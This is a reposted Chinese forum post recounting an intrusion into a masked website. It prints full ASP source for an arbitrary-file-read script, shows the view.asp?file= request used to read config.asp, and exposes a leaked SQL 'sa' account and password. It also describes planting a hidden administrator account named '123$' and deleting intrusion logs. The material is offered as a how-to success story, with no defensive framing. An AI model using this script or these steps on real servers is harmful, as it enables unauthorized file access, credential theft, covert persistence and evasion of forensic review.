• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    黑客是如何突破一流检测系统的

    发布者: 网神之王 | 发布时间: 2025-6-27 15:20| 查看数: 60| 评论数: 0|帖子模式

    攻击目标:www.***.com
    测试过的动作,一句话马,加密马,等。
    测试结果:无效,无法上传,无法进入系统。
    经过2天的分析,
    然后自己搞出了一个代码,利用此代码读取了该网站下的config.asp文件源代码 -------------------------------------------------------------------------<%
    file=Request("file")
    Set FSOOBJ=Server.CreateObject("Scripting.FileSystemObject")
    if FSOOBJ.fileExists(file) then
    Set myfile=FSOOBJ.opentextfile(file,1)
    Response.write "<pre>" & server.HTMLEncode(myfile.readall) &"</pre>"
    myfile.close
    Set myfile=nothing
    else
    Response.write "file(" & file & ") not exists."
    end if
    %>
    -------------------------------------------------------------------------http://www.***.com/view.asp?file=D:\wwwroot\index.asp读取到的敏感内容
    sql地址:***.***.***.***
    帐号:sa 密码:u8f2444f利用此帐号进入后,建立了123$的隐藏管理员用户,删除入侵日志后退出。

    来源:https://www.jb51.net/hack/5375.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表